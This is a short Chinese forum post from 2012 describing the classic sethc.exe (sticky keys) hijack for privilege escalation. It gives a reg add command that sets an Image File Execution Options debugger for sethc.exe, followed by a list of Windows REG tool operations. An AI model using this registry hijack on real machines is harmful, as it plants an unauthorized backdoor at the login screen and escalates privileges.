命令行下操作注册表劫持sethc提权

[复制链接]
查看339 | 回复0 | 2012-4-1 19:23:43 | 显示全部楼层 |阅读模式
经典的利用劫持替换sethc.exe的例子:


regadd"HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe"/vdebugger/dtaskmgr.exe/f
-----------------------------------------------------------------------------------------------------------------------------------------------
Windows控制台注册表工具-版本3.0
格式就是:REGOperation参数列表

返回代码:0-成功1-失败(除了REGCOMPARE)
Operation有11个,可以这样得到帮助:REGOperation/?

REGQUERY

REGADD

REGDELETE

REGCOPY

REGSAVE

REGRESTORE

REGLOAD

REGUNLOAD

REGCOMPARE

REGEXPORT

REGIMPORT
 
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则